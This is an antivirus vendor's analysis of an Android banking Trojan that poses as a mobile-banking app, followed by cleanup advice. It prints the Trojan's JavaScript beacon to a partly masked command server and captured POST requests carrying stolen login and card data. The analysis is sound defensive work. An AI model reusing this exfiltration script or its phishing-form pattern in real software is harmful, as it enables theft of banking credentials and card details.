Mi biblioteca
Mi biblioteca

+ Añadir a la biblioteca

Soporte
Soporte 24 horas | Normas de contactar

Sus solicitudes

Perfil

Android.BankBot.336.origin

Added to the Dr.Web virus database: 2018-02-23

Virus description added:

SHA1:

  • c524334f1357a4548fa609c125fa66cb0df4c0e6

A Trojan for Android mobile devices. It is distributed under the guise of the application “Universalnyj mobilnyj banking” (Universal mobile banking), which supposedly provides access to services of various credit organizations. The malicious program has been detected on Google Play.

screen Android.BankBot.336.origin #drweb

The Trojan communicates with the command and control server via the WebView window. A certain JavaScript is executed for each request. For example, in order to inform the server of cybercriminals on successful infection of the mobile device, Android.BankBot.336.origin executes the following script after its launch:

var url = 'https://***adv.ru/api/input.php'; var params = 'type=1&data='; var xhr = new XMLHttpRequest(); xhr.open('POST', url, true); xhr.setRequestHeader('Content-type', 'application/x-www-form-urlencoded'); xhr.send(params);

As a result, the following POST request is sent to the remote host:

POST HTTP/1.1 https://***adv.ru/api/input.php
Host: ***adv.ru
Connection: keep-alive
Content-Length: 23
Origin: null
User-Agent: Mozilla/5.0 (Linux; Android 5.1; Philips S337 Build/LMY47D; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0
Chrome/61.0.3163.98 Mobile Safari/537.36
Content-type: application/x-www-form-urlencoded
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: en-US
X-Requested-With: gvrn.usigroshi.tit
type=1&data=fCVwX23bfgQ

Several phishing input forms are designed in the Trojan to steal confidential information.

In the “Sign in” section, login credentials are requested to get access to online banking:

screen Android.BankBot.336.origin #drweb

When a user inputs confidential information and attempts to log in to their account, Android.BankBot.336.origin generates the POST request, which looks the following way:

POST HTTP/1.1 https://***adv.ru/api/input.php
Host: ***adv.ru
Connection: keep-alive
Content-Length: 72
Origin: null
User-Agent: Mozilla/5.0 (Linux; Android 5.1; Philips S337 Build/LMY47D; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0
Chrome/61.0.3163.98 Mobile Safari/537.36
Content-type: application/x-www-form-urlencoded
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: en-US
X-Requested-With: gvrn.usigroshi.tit
type=2&hsh=fCVwX23bfgQ&bnk=pb&data=+380 9* *** ** **========password4321

and sends the obtained information to the server of cybercriminals.

In the “Sign up” section, banking card data are requested.

screen Android.BankBot.336.origin #drweb

After clicking the registration button, Android.BankBot.336.origin generates another POST request and sends the obtained data to the command and control server.

POST HTTP/1.1 https://***adv.ru/api/input.php
Host: ***adv.ru
Connection: keep-alive
Content-Length: 120
Origin: null
User-Agent: Mozilla/5.0 (Linux; Android 5.1; Philips S337 Build/LMY47D; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0
Chrome/61.0.3163.98 Mobile Safari/537.36
Content-type: application/x-www-form-urlencoded
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: en-US
X-Requested-With: gvrn.usigroshi.tit
type=3&hsh=fCVwX23bfgQ&bnk=pb&data=5105 1051 0510
51**========11/23========5**========18**========96*******========57***

The banker has a function for stealing incoming SMS messages; however, due to the fact that Android.BankBot.336.origin is designed to run on devices with Android 4.4 and its later versions and is not an SMS manager by default, in practice it cannot intercept incoming messages.

Curing recommendations


Android

  1. If the mobile device is operating normally, download and install Dr.Web for Android Light. Run a full system scan and follow recommendations to neutralize the detected threats.
  2. If the mobile device has been locked by Android.Locker ransomware (the message on the screen tells you that you have broken some law or demands a set ransom amount; or you will see some other announcement that prevents you from using the handheld normally), do the following:
    • Load your smartphone or tablet in the safe mode (depending on the operating system version and specifications of the particular mobile device involved, this procedure can be performed in various ways; seek clarification from the user guide that was shipped with the device, or contact its manufacturer);
    • Once you have activated safe mode, install the Dr.Web для Android Light onto the infected handheld and run a full scan of the system; follow the steps recommended for neutralizing the threats that have been detected;
    • Switch off your device and turn it on as normal.

Find out more about Dr.Web for Android